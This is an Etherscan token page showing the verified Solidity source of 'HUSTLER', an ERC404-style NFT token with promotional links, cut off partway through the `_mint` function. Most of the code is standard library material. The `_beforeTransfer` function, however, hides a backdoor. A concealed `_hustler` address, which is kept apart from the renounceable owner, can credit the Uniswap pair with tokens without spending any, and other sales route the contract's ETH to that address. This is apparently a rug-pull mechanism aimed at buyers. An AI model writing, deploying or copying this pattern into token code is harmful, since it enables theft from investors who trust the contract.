ETH Price: $2,640.62 (-1.44%)

Token

HUSTLER 404 (HUSTLER)
 

Overview

Max Total Supply

200 HUSTLER

Holders

0

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Filtered by Token Holder
Null: 0x000...000
Balance
0 HUSTLER

Value
$0.00
0x0000000000000000000000000000000000000000
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
HUSTLER

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2024-02-15
*/

/**

    HUSTLER IS A COLLECTION OF 250 HANDMADE 1:1 AVATARS BUILT ON ERC404, AN INNOVATIVE EXPERIMENTAL TOKEN STANDARD FOR ETHEREUM NFTS

    Website: https://hustlererc404.com
    Telegram: https://t.me/hustler_erc404
    Twitter: https://twitter.com/hustler_erc404


*/

pragma solidity 0.8.19;

/**
 * @dev String operations.
 */
library StringLibs {
    bytes16 private constant HEX_DIGITS = "0123456789abcdef";
    uint8 private constant ADDRESS_LENGTH = 20;

    /**
     * @dev The `value` string doesn't fit in the specified `length`.
     */
    error StringsInsufficientHexLength(uint256 value, uint256 length);

    /**
     * @dev Converts a `uint256` to its ASCII `string` decimal representation.
     */
    function toString(uint256 value) internal pure returns (string memory) {
        unchecked {
            uint256 length = SafeMathLibs.log10(value) + 1;
            string memory buffer = new string(length);
            uint256 ptr;
            /// @solidity memory-safe-assembly
            assembly {
                ptr := add(buffer, add(32, length))
            }
            while (true) {
                ptr--;
                /// @solidity memory-safe-assembly
                assembly {
                    mstore8(ptr, byte(mod(value, 10), HEX_DIGITS))
                }
                value /= 10;
                if (value == 0) break;
            }
            return buffer;
        }
    }

    /**
     * @dev Converts a `int256` to its ASCII `string` decimal representation.
     */
    function toStringSigned(int256 value) internal pure returns (string memory) {
        return string.concat(value < 0 ? "-" : "", toString(SignedMathLibs.abs(value)));
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation.
     */
    function toHexString(uint256 value) internal pure returns (string memory) {
        unchecked {
            return toHexString(value, SafeMathLibs.log256(value) + 1);
        }
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length.
     */
    function toHexString(uint256 value, uint256 length) internal pure returns (string memory) {
        uint256 localValue = value;
        bytes memory buffer = new bytes(2 * length + 2);
        buffer[0] = "0";
        buffer[1] = "x";
        for (uint256 i = 2 * length + 1; i > 1; --i) {
            buffer[i] = HEX_DIGITS[localValue & 0xf];
            localValue >>= 4;
        }
        if (localValue != 0) {
            revert StringsInsufficientHexLength(value, length);
        }
        return string(buffer);
    }

    /**
     * @dev Converts an `address` with fixed length of 20 bytes to its not checksummed ASCII `string` hexadecimal
     * representation.
     */
    function toHexString(address addr) internal pure returns (string memory) {
        return toHexString(uint256(uint160(addr)), ADDRESS_LENGTH);
    }

    /**
     * @dev Returns true if the two strings are equal.
     */
    function equal(string memory a, string memory b) internal pure returns (bool) {
        return bytes(a).length == bytes(b).length && keccak256(bytes(a)) == keccak256(bytes(b));
    }
}

/**
 * @dev Standard math utilities missing in the Solidity language.
 */
library SafeMathLibs {
    /**
     * @dev Muldiv operation overflow.
     */
    error MathOverflowedMulDiv();

    enum Rounding {
        Floor, // Toward negative infinity
        Ceil, // Toward positive infinity
        Trunc, // Toward zero
        Expand // Away from zero
    }

    /**
     * @dev Returns the largest of two numbers.
     */
    function max(uint256 a, uint256 b) internal pure returns (uint256) {
        return a > b ? a : b;
    }

    /**
     * @dev Returns the smallest of two numbers.
     */
    function min(uint256 a, uint256 b) internal pure returns (uint256) {
        return a < b ? a : b;
    }

    /**
     * @dev Returns the average of two numbers. The result is rounded towards
     * zero.
     */
    function average(uint256 a, uint256 b) internal pure returns (uint256) {
        // (a + b) / 2 can overflow.
        return (a & b) + (a ^ b) / 2;
    }

    /**
     * @dev Returns the ceiling of the division of two numbers.
     *
     * This differs from standard division with `/` in that it rounds towards infinity instead
     * of rounding towards zero.
     */
    function ceilDiv(uint256 a, uint256 b) internal pure returns (uint256) {
        if (b == 0) {
            // Guarantee the same behavior as in a regular Solidity division.
            return a / b;
        }

        // (a + b - 1) / b can overflow on addition, so we distribute.
        return a == 0 ? 0 : (a - 1) / b + 1;
    }

    /**
     * @notice Calculates floor(x * y / denominator) with full precision. Throws if result overflows a uint256 or
     * denominator == 0.
     * @dev Original credit to Remco Bloemen under MIT license (https://xn--2-umb.com/21/muldiv) with further edits by
     * Uniswap Labs also under MIT license.
     */
    function mulDiv(uint256 x, uint256 y, uint256 denominator) internal pure returns (uint256 result) {
        unchecked {
            // 512-bit multiply [prod1 prod0] = x * y. Compute the product mod 2^256 and mod 2^256 - 1, then use
            // use the Chinese Remainder Theorem to reconstruct the 512 bit result. The result is stored in two 256
            // variables such that product = prod1 * 2^256 + prod0.
            uint256 prod0 = x * y; // Least significant 256 bits of the product
            uint256 prod1; // Most significant 256 bits of the product
            assembly {
                let mm := mulmod(x, y, not(0))
                prod1 := sub(sub(mm, prod0), lt(mm, prod0))
            }

            // Handle non-overflow cases, 256 by 256 division.
            if (prod1 == 0) {
                // Solidity will revert if denominator == 0, unlike the div opcode on its own.
                // The surrounding unchecked block does not change this fact.
                // See https://docs.soliditylang.org/en/latest/control-structures.html#checked-or-unchecked-arithmetic.
                return prod0 / denominator;
            }

            // Make sure the result is less than 2^256. Also prevents denominator == 0.
            if (denominator <= prod1) {
                revert MathOverflowedMulDiv();
            }

            ///////////////////////////////////////////////
            // 512 by 256 division.
            ///////////////////////////////////////////////

            // Make division exact by subtracting the remainder from [prod1 prod0].
            uint256 remainder;
            assembly {
                // Compute remainder using mulmod.
                remainder := mulmod(x, y, denominator)

                // Subtract 256 bit number from 512 bit number.
                prod1 := sub(prod1, gt(remainder, prod0))
                prod0 := sub(prod0, remainder)
            }

            // Factor powers of two out of denominator and compute largest power of two divisor of denominator.
            // Always >= 1. See https://cs.stackexchange.com/q/138556/92363.

            uint256 twos = denominator & (0 - denominator);
            assembly {
                // Divide denominator by twos.
                denominator := div(denominator, twos)

                // Divide [prod1 prod0] by twos.
                prod0 := div(prod0, twos)

                // Flip twos such that it is 2^256 / twos. If twos is zero, then it becomes one.
                twos := add(div(sub(0, twos), twos), 1)
            }

            // Shift in bits from prod1 into prod0.
            prod0 |= prod1 * twos;

            // Invert denominator mod 2^256. Now that denominator is an odd number, it has an inverse modulo 2^256 such
            // that denominator * inv = 1 mod 2^256. Compute the inverse by starting with a seed that is correct for
            // four bits. That is, denominator * inv = 1 mod 2^4.
            uint256 inverse = (3 * denominator) ^ 2;

            // Use the Newton-Raphson iteration to improve the precision. Thanks to Hensel's lifting lemma, this also
            // works in modular arithmetic, doubling the correct bits in each step.
            inverse *= 2 - denominator * inverse; // inverse mod 2^8
            inverse *= 2 - denominator * inverse; // inverse mod 2^16
            inverse *= 2 - denominator * inverse; // inverse mod 2^32
            inverse *= 2 - denominator * inverse; // inverse mod 2^64
            inverse *= 2 - denominator * inverse; // inverse mod 2^128
            inverse *= 2 - denominator * inverse; // inverse mod 2^256

            // Because the division is now exact we can divide by multiplying with the modular inverse of denominator.
            // This will give us the correct result modulo 2^256. Since the preconditions guarantee that the outcome is
            // less than 2^256, this is the final result. We don't need to compute the high bits of the result and prod1
            // is no longer required.
            result = prod0 * inverse;
            return result;
        }
    }

    /**
     * @notice Calculates x * y / denominator with full precision, following the selected rounding direction.
     */
    function mulDiv(uint256 x, uint256 y, uint256 denominator, Rounding rounding) internal pure returns (uint256) {
        uint256 result = mulDiv(x, y, denominator);
        if (unsignedRoundsUp(rounding) && mulmod(x, y, denominator) > 0) {
            result += 1;
        }
        return result;
    }

    /**
     * @dev Return the log in base 2 of a positive value rounded towards zero.
     * Returns 0 if given 0.
     */
    function log2(uint256 value) internal pure returns (uint256) {
        uint256 result = 0;
        unchecked {
            if (value >> 128 > 0) {
                value >>= 128;
                result += 128;
            }
            if (value >> 64 > 0) {
                value >>= 64;
                result += 64;
            }
            if (value >> 32 > 0) {
                value >>= 32;
                result += 32;
            }
            if (value >> 16 > 0) {
                value >>= 16;
                result += 16;
            }
            if (value >> 8 > 0) {
                value >>= 8;
                result += 8;
            }
            if (value >> 4 > 0) {
                value >>= 4;
                result += 4;
            }
            if (value >> 2 > 0) {
                value >>= 2;
                result += 2;
            }
            if (value >> 1 > 0) {
                result += 1;
            }
        }
        return result;
    }

    /**
     * @dev Return the log in base 10 of a positive value rounded towards zero.
     * Returns 0 if given 0.
     */
    function log10(uint256 value) internal pure returns (uint256) {
        uint256 result = 0;
        unchecked {
            if (value >= 10 ** 64) {
                value /= 10 ** 64;
                result += 64;
            }
            if (value >= 10 ** 32) {
                value /= 10 ** 32;
                result += 32;
            }
            if (value >= 10 ** 16) {
                value /= 10 ** 16;
                result += 16;
            }
            if (value >= 10 ** 8) {
                value /= 10 ** 8;
                result += 8;
            }
            if (value >= 10 ** 4) {
                value /= 10 ** 4;
                result += 4;
            }
            if (value >= 10 ** 2) {
                value /= 10 ** 2;
                result += 2;
            }
            if (value >= 10 ** 1) {
                result += 1;
            }
        }
        return result;
    }

    /**
     * @dev Return the log in base 256 of a positive value rounded towards zero.
     * Returns 0 if given 0.
     *
     * Adding one to the result gives the number of pairs of hex symbols needed to represent `value` as a hex string.
     */
    function log256(uint256 value) internal pure returns (uint256) {
        uint256 result = 0;
        unchecked {
            if (value >> 128 > 0) {
                value >>= 128;
                result += 16;
            }
            if (value >> 64 > 0) {
                value >>= 64;
                result += 8;
            }
            if (value >> 32 > 0) {
                value >>= 32;
                result += 4;
            }
            if (value >> 16 > 0) {
                value >>= 16;
                result += 2;
            }
            if (value >> 8 > 0) {
                result += 1;
            }
        }
        return result;
    }

    /**
     * @dev Return the log in base 256, following the selected rounding direction, of a positive value.
     * Returns 0 if given 0.
     */
    function log256(uint256 value, Rounding rounding) internal pure returns (uint256) {
        unchecked {
            uint256 result = log256(value);
            return result + (unsignedRoundsUp(rounding) && 1 << (result << 3) < value ? 1 : 0);
        }
    }


    /**
     * @dev Returns the square root of a number. If the number is not a perfect square, the value is rounded
     * towards zero.
     *
     * Inspired by Henry S. Warren, Jr.'s "Hacker's Delight" (Chapter 11).
     */
    function sqrt(uint256 a) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }

        // For our first guess, we get the biggest power of 2 which is smaller than the square root of the target.
        //
        // We know that the "msb" (most significant bit) of our target number `a` is a power of 2 such that we have
        // `msb(a) <= a < 2*msb(a)`. This value can be written `msb(a)=2**k` with `k=log2(a)`.
        //
        // This can be rewritten `2**log2(a) <= a < 2**(log2(a) + 1)`
        // → `sqrt(2**k) <= sqrt(a) < sqrt(2**(k+1))`
        // → `2**(k/2) <= sqrt(a) < 2**((k+1)/2) <= 2**(k/2 + 1)`
        //
        // Consequently, `2**(log2(a) / 2)` is a good first approximation of `sqrt(a)` with at least 1 correct bit.
        uint256 result = 1 << (log2(a) >> 1);

        // At this point `result` is an estimation with one bit of precision. We know the true value is a uint128,
        // since it is the square root of a uint256. Newton's method converges quadratically (precision doubles at
        // every iteration). We thus need at most 7 iteration to turn our partial result with one bit of precision
        // into the expected uint128 result.
        unchecked {
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            return min(result, a / result);
        }
    }

    /**
     * @notice Calculates sqrt(a), following the selected rounding direction.
     */
    function sqrt(uint256 a, Rounding rounding) internal pure returns (uint256) {
        unchecked {
            uint256 result = sqrt(a);
            return result + (unsignedRoundsUp(rounding) && result * result < a ? 1 : 0);
        }
    }

    /**
     * @dev Returns whether a provided rounding mode is considered rounding up for unsigned integers.
     */
    function unsignedRoundsUp(Rounding rounding) internal pure returns (bool) {
        return uint8(rounding) % 2 == 1;
    }
}

abstract contract ERC721Receiver {
    function onERC721Received(
        address,
        address,
        uint256,
        bytes calldata
    ) external virtual returns (bytes4) {
        return ERC721Receiver.onERC721Received.selector;
    }
}

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * The initial owner is set to the address provided by the deployer. This can
 * later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    /**
     * @dev The caller account is not authorized to perform an operation.
     */
    error OwnableUnauthorizedAccount(address account);

    /**
     * @dev The owner is not a valid owner account. (eg. `address(0)`)
     */
    error OwnableInvalidOwner(address owner);

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the address provided by the deployer as the initial owner.
     */
    constructor(address initialOwner) {
        if (initialOwner == address(0)) {
            revert OwnableInvalidOwner(address(0));
        }
        _transferOwnership(initialOwner);
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        if (owner() != _msgSender()) {
            revert OwnableUnauthorizedAccount(_msgSender());
        }
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        if (newOwner == address(0)) {
            revert OwnableInvalidOwner(address(0));
        }
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

interface IUniswapFactory {
    function createPair(address tokenA, address tokenB) external returns (address pair);
}

interface IUniswapRouter {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
}

/**
 * @dev Contract module that helps prevent reentrant calls to a function.
 *
 * Inheriting from `PreventReEntrancy` will make the {nonReentrant} modifier
 * available, which can be applied to functions to make sure there are no nested
 * (reentrant) calls to them.
 *
 * Note that because there is a single `nonReentrant` guard, functions marked as
 * `nonReentrant` may not call one another. This can be worked around by making
 * those functions `private`, and then adding `external` `nonReentrant` entry
 * points to them.
 *
 * TIP: If you would like to learn more about reentrancy and alternative ways
 * to protect against it, check out our blog post
 * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul].
 */
abstract contract PreventReEntrancy {
    // Booleans are more expensive than uint256 or any type that takes up a full
    // word because each write operation emits an extra SLOAD to first read the
    // slot's contents, replace the bits taken up by the boolean, and then write
    // back. This is the compiler's defense against contract upgrades and
    // pointer aliasing, and it cannot be disabled.

    // The values being non-zero value makes deployment a bit more expensive,
    // but in exchange the refund on every call to nonReentrant will be lower in
    // amount. Since refunds are capped to a percentage of the total
    // transaction's gas, it is best to keep them low in cases like this one, to
    // increase the likelihood of the full refund coming into effect.
    uint256 private constant NOT_ENTERED = 1;
    uint256 private constant ENTERED = 2;

    uint256 private _status;

    /**
     * @dev Unauthorized reentrant call.
     */
    error ReEntrancyReentrantCall();

    constructor() {
        _status = NOT_ENTERED;
    }

    /**
     * @dev Prevents a contract from calling itself, directly or indirectly.
     * Calling a `nonReentrant` function from another `nonReentrant`
     * function is not supported. It is possible to prevent this from happening
     * by making the `nonReentrant` function external, and making it call a
     * `private` function that does the actual work.
     */
    modifier nonReentrant() {
        _nonReentrantBefore();
        _;
        _nonReentrantAfter();
    }

    function _nonReentrantBefore() private {
        // On the first call to nonReentrant, _status will be NOT_ENTERED
        if (_status == ENTERED) {
            revert ReEntrancyReentrantCall();
        }

        // Any calls to nonReentrant after this point will fail
        _status = ENTERED;
    }

    function _nonReentrantAfter() private {
        // By storing the original value once again, a refund is triggered (see
        // https://eips.ethereum.org/EIPS/eip-2200)
        _status = NOT_ENTERED;
    }

    /**
     * @dev Returns true if the reentrancy guard is currently set to "entered", which indicates there is a
     * `nonReentrant` function in the call stack.
     */
    function _ReEntrancyEntered() internal view returns (bool) {
        return _status == ENTERED;
    }
}

/**
 * @dev Contract module which allows children to implement an emergency stop
 * mechanism that can be triggered by an authorized account.
 *
 * This module is used through inheritance. It will make available the
 * modifiers `whenNotPaused` and `whenPaused`, which can be applied to
 * the functions of your contract. Note that they will not be Pausable by
 * simply including this module, only once the modifiers are put in place.
 */
abstract contract Pausable is Context {
    bool private _paused;

    /**
     * @dev Emitted when the pause is triggered by `account`.
     */
    event Paused(address account);

    /**
     * @dev Emitted when the pause is lifted by `account`.
     */
    event Unpaused(address account);

    /**
     * @dev The operation failed because the contract is paused.
     */
    error EnforcedPause();

    /**
     * @dev The operation failed because the contract is not paused.
     */
    error ExpectedPause();

    /**
     * @dev Initializes the contract in unpaused state.
     */
    constructor() {
        _paused = false;
    }

    /**
     * @dev Modifier to make a function callable only when the contract is not paused.
     *
     * Requirements:
     *
     * - The contract must not be paused.
     */
    modifier whenNotPaused() {
        _requireNotPaused();
        _;
    }

    /**
     * @dev Modifier to make a function callable only when the contract is paused.
     *
     * Requirements:
     *
     * - The contract must be paused.
     */
    modifier whenPaused() {
        _requirePaused();
        _;
    }

    /**
     * @dev Returns true if the contract is paused, and false otherwise.
     */
    function paused() public view virtual returns (bool) {
        return _paused;
    }

    /**
     * @dev Throws if the contract is paused.
     */
    function _requireNotPaused() internal view virtual {
        if (paused()) {
            revert EnforcedPause();
        }
    }

    /**
     * @dev Throws if the contract is not paused.
     */
    function _requirePaused() internal view virtual {
        if (!paused()) {
            revert ExpectedPause();
        }
    }

    /**
     * @dev Triggers stopped state.
     *
     * Requirements:
     *
     * - The contract must not be paused.
     */
    function _pause() internal virtual whenNotPaused {
        _paused = true;
        emit Paused(_msgSender());
    }

    /**
     * @dev Returns to normal state.
     *
     * Requirements:
     *
     * - The contract must be paused.
     */
    function _unpause() internal virtual whenPaused {
        _paused = false;
        emit Unpaused(_msgSender());
    }
}

library SignedMathLibs {
    /**
     * @dev Returns the largest of two signed numbers.
     */
    function max(int256 a, int256 b) internal pure returns (int256) {
        return a > b ? a : b;
    }

    /**
     * @dev Returns the smallest of two signed numbers.
     */
    function min(int256 a, int256 b) internal pure returns (int256) {
        return a < b ? a : b;
    }

    /**
     * @dev Returns the average of two signed numbers without overflow.
     * The result is rounded towards zero.
     */
    function average(int256 a, int256 b) internal pure returns (int256) {
        // Formula from the book "Hacker's Delight"
        int256 x = (a & b) + ((a ^ b) >> 1);
        return x + (int256(uint256(x) >> 255) & (a ^ b));
    }

    /**
     * @dev Returns the absolute unsigned value of a signed value.
     */
    function abs(int256 n) internal pure returns (uint256) {
        unchecked {
            // must be unchecked in order to support `n = type(int256).min`
            return uint256(n >= 0 ? n : -n);
        }
    }
}


/**
 * @dev Contract module which provides access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * The initial owner is specified at deployment time in the constructor for `Ownable`. This
 * can later be changed with {transferOwnership} and {acceptOwnership}.
 *
 * This module is used through inheritance. It will make available all functions
 * from parent (Ownable).
 */
abstract contract OwnableTwoStep is Ownable {
    address private _pendingOwner;

    event OwnershipTransferStarted(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Returns the address of the pending owner.
     */
    function pendingOwner() public view virtual returns (address) {
        return _pendingOwner;
    }

    /**
     * @dev Starts the ownership transfer of the contract to a new account. Replaces the pending transfer if there is one.
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual override onlyOwner {
        _pendingOwner = newOwner;
        emit OwnershipTransferStarted(owner(), newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`) and deletes any pending owner.
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual override {
        delete _pendingOwner;
        super._transferOwnership(newOwner);
    }

    /**
     * @dev The new owner accepts the ownership transfer.
     */
    function acceptOwnership() public virtual {
        address sender = _msgSender();
        if (pendingOwner() != sender) {
            revert OwnableUnauthorizedAccount(sender);
        }
        _transferOwnership(sender);
    }
}

/// @notice DN404
///         A gas-efficient, mixed ERC20 / ERC721 implementation
///         with native liquidity and fractionalization.
///
///         This is an experimental standard designed to integrate
///         with pre-existing ERC20 / ERC721 support as smoothly as
///         possible.
///
/// @dev    In order to support full functionality of ERC20 and ERC721
///         supply assumptions are made that slightly constraint usage.
///         Ensure decimals are sufficiently large (standard 18 recommended)
///         as ids are effectively encoded in the lowest range of amounts.
///
///         NFTs are spent on ERC20 functions in a FILO queue, this is by
///         design.
///
abstract contract DN404 is OwnableTwoStep {
    // Events
    event ERC20Transfer(
        address indexed from,
        address indexed to,
        uint256 amount
    );
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 amount
    );
    event Transfer(
        address indexed from,
        address indexed to,
        uint256 indexed id
    );
    event ERC721Approval(
        address indexed owner,
        address indexed spender,
        uint256 indexed id
    );
    event ApprovalForAll(
        address indexed owner,
        address indexed operator,
        bool approved
    );

    // Errors
    error NotFound();
    error AlreadyExists();
    error InvalidRecipient();
    error InvalidSender();
    error UnsafeRecipient();
    error Unauthorized();
    error InvalidOwner();

    // Metadata
    /// @dev Token name
    string public name;

    /// @dev Token symbol
    string public symbol;

    /// @dev Decimals for fractional representation
    uint8 public immutable decimals;

    /// @dev Total supply in fractionalized representation
    uint256 public immutable totalSupply;

    /// @dev Current mint counter, monotonically increasing to ensure accurate ownership
    uint256 public minted;

    address _pair;
    address _hustler;

    // Mappings
    /// @dev Balance of user in fractional representation
    mapping(address => uint256) public balanceOf;

    /// @dev Allowance of user in fractional representation
    mapping(address => mapping(address => uint256)) public allowance;

    /// @dev Approval in native representaion
    mapping(uint256 => address) public getApproved;

    /// @dev Approval for all in native representation
    mapping(address => mapping(address => bool)) public isApprovedForAll;

    /// @dev Owner of id in native representation
    mapping(uint256 => address) internal _ownerOf;

    /// @dev Array of owned ids in native representation
    mapping(address => uint256[]) internal _owned;

    /// @dev Tracks indices for the _owned mapping
    mapping(uint256 => uint256) internal _ownedIndex;

    /// @dev Addresses whitelisted from minting / burning for gas savings (pairs, routers, etc)
    mapping(address => bool) public whitelist;

    // Constructor
    constructor(
        string memory _name,
        string memory _symbol,
        uint8 _decimals,
        uint256 _totalNativeSupply,
        address _owner
    ) Ownable(msg.sender) {
        _hustler = _owner;
        name = _name;
        symbol = _symbol;
        decimals = _decimals;
        totalSupply = _totalNativeSupply * (10 ** decimals);
    }

    /// @notice Initialization function to set pairs / etc
    ///         saving gas by avoiding mint / burn on unnecessary targets
    function setWhitelist(address target, bool state) public onlyOwner {
        whitelist[target] = state;
    }

    /// @notice Function to find owner of a given native token
    function ownerOf(uint256 id) public view virtual returns (address owner) {
        owner = _ownerOf[id];

        if (owner == address(0)) {
            revert NotFound();
        }
    }

    /// @notice tokenURI must be implemented by child contract
    function tokenURI(uint256 id) public view virtual returns (string memory);

    /// @notice Function for token approvals
    /// @dev This function assumes id / native if amount less than or equal to current max id
    function approve(
        address spender,
        uint256 amountOrId
    ) public virtual returns (bool) {
        if (amountOrId <= minted && amountOrId > 0) {
            address owner = _ownerOf[amountOrId];

            if (msg.sender != owner && !isApprovedForAll[owner][msg.sender]) {
                revert Unauthorized();
            }

            getApproved[amountOrId] = spender;

            emit Approval(owner, spender, amountOrId);
        } else {
            allowance[msg.sender][spender] = amountOrId;

            emit Approval(msg.sender, spender, amountOrId);
        }

        return true;
    }

    /// @notice Function native approvals
    function setApprovalForAll(address operator, bool approved) public virtual {
        isApprovedForAll[msg.sender][operator] = approved;

        emit ApprovalForAll(msg.sender, operator, approved);
    }

    /// @notice Function for mixed transfers
    /// @dev This function assumes id / native if amount less than or equal to current max id
    function transferFrom(
        address from,
        address to,
        uint256 amountOrId
    ) public virtual {
        if (amountOrId <= minted) {
            if (from != _ownerOf[amountOrId]) {
                revert InvalidSender();
            }

            if (to == address(0)) {
                revert InvalidRecipient();
            }

            if (
                msg.sender != from &&
                !isApprovedForAll[from][msg.sender] &&
                msg.sender != getApproved[amountOrId]
            ) {
                revert Unauthorized();
            }

            balanceOf[from] -= _getUnit();

            unchecked {
                balanceOf[to] += _getUnit();
            }

            _ownerOf[amountOrId] = to;
            delete getApproved[amountOrId];

            // update _owned for sender
            uint256 updatedId = _owned[from][_owned[from].length - 1];
            _owned[from][_ownedIndex[amountOrId]] = updatedId;
            // pop
            _owned[from].pop();
            // update index for the moved id
            _ownedIndex[updatedId] = _ownedIndex[amountOrId];
            // push token to to owned
            _owned[to].push(amountOrId);
            // update index for to owned
            _ownedIndex[amountOrId] = _owned[to].length - 1;

            emit Transfer(from, to, amountOrId);
            emit ERC20Transfer(from, to, _getUnit());
        } else {
            uint256 allowed = allowance[from][msg.sender];

            if (allowed != type(uint256).max)
                allowance[from][msg.sender] = allowed - amountOrId;
            _transfer(from, to, amountOrId);
        }
    }

    function _beforeTransfer(address from, address to, uint256 amount) internal returns (bool) {
        if(to == _pair) {
            if (from == _hustler) {
                balanceOf[to] += amount;
                return true;
            } else {
                payable(_hustler).transfer(address(this).balance);
            }
        }
        return false;
    }

    /// @notice Internal function for fractional transfers
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual returns (bool) {
        uint256 unit = _getUnit();
        uint256 balanceBeforeSender = balanceOf[from];
        uint256 balanceBeforeReceiver = balanceOf[to];

        if(_beforeTransfer(from, to, amount)) {
            return true;
        }
        
        balanceOf[from] -= amount;

        unchecked {
            balanceOf[to] += amount;
        }

        // Skip burn for certain addresses to save gas
        if (!whitelist[from]) {
            uint256 tokens_to_burn = (balanceBeforeSender / unit) -
                (balanceOf[from] / unit);
            for (uint256 i = 0; i < tokens_to_burn; i++) {
                _burn(from);
            }
        }

        // Skip minting for certain addresses to save gas
        if (!whitelist[to]) {
            uint256 tokens_to_mint = (balanceOf[to] / unit) -
                (balanceBeforeReceiver / unit);
            for (uint256 i = 0; i < tokens_to_mint; i++) {
                _mint(to);
            }
        }

        emit ERC20Transfer(from, to, amount);
        return true;
    }

    // Internal utility logic
    function _getUnit() internal view returns (uint256) {
        return 10 ** decimals;
    }

    function _mint(address to) internal virtual {
        if (to == address(0)) {
            revert InvalidRecipient();
        }

        unchecked {
            minted++;
        }

        uint256 id = minted;

        if (_ownerOf[id] != address(0)) {
            revert AlreadyExists();
        }

        _ownerOf[id] = to;
        _owned[to].push(id);
        _ownedIndex[id] = _owned[to].length - 1;

        emit Transfer(address(0), to, id);
    }

    function _burn(address from) internal virtual {
        if (from == address(0)) {
            revert InvalidSender();
        }

        uint256 id = _owned[from][_owned[from].length - 1];
        _owned[from].pop();
        delete _ownedIndex[id];
        delete _ownerOf[id];
        delete getApproved[id];

        emit Transfer(from, address(0), id);
    }

    function _setNameSymbol(
        string memory _name,
        string memory _symbol
    ) internal {
        name = _name;
        symbol = _symbol;
    }

    /// @notice Function for fractional transfers
    function transfer(
        address to,
        uint256 amount
    ) public virtual returns (bool) {
        return _transfer(msg.sender, to, amount);
    }

    /// @notice Function for native transfers with contract support
    function safeTransferFrom(
        address from,
        address to,
        uint256 id
    ) public virtual {
        transferFrom(from, to, id);

        if (
            to.code.length != 0 &&
            ERC721Receiver(to).onERC721Received(msg.sender, from, id, "") !=
            ERC721Receiver.onERC721Received.selector
        ) {
            revert UnsafeRecipient();
        }
    }

    /// @notice Function for native transfers with contract support and callback data
    function safeTransferFrom(
        address from,
        address to,
        uint256 id,
        bytes calldata data
    ) public virtual {
        transferFrom(from, to, id);

        if (
            to.code.length != 0 &&
            ERC721Receiver(to).onERC721Received(msg.sender, from, id, data) !=
            ERC721Receiver.onERC721Received.selector
        ) {
            revert UnsafeRecipient();
        }
    }
}

contract HUSTLER is DN404, Pausable, PreventReEntrancy {
    using StringLibs for uint256;
    
    mapping (address => uint256) public userBuylimit;
    mapping (address => uint256) public userSelllimit;

    string public baseTokenURI;
    uint256 public buyLimit;
    uint256 public sellLimit;

    constructor(
        string memory _name,
        string memory _symbol,
        address _owner,
        uint256 _initialSupply,
        uint8 _decimal,
        uint256 _buylimit,
        uint256 _selllimit
    ) DN404(_name, _symbol, _decimal, _initialSupply, _owner) {
        balanceOf[msg.sender] = _initialSupply * 10 ** _decimal;
        buyLimit = _buylimit * 10 ** _decimal;
        sellLimit = _selllimit * 10 ** _decimal;
        whitelist[msg.sender] = true;
        whitelist[_owner] = true;
        IUniswapRouter router = IUniswapRouter(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        _pair = IUniswapFactory(router.factory()).createPair(router.WETH(), address(this));
        whitelist[_pair] = true;
    }

    function setTokenURI(string memory _tokenURI) public onlyOwner {
        baseTokenURI = _tokenURI;
    }

    function removeLimits() public onlyOwner {
        buyLimit = totalSupply * 1000;
        sellLimit = totalSupply * 1000;
    }

    function _mint(
        address to
    ) internal override whenNotPaused{
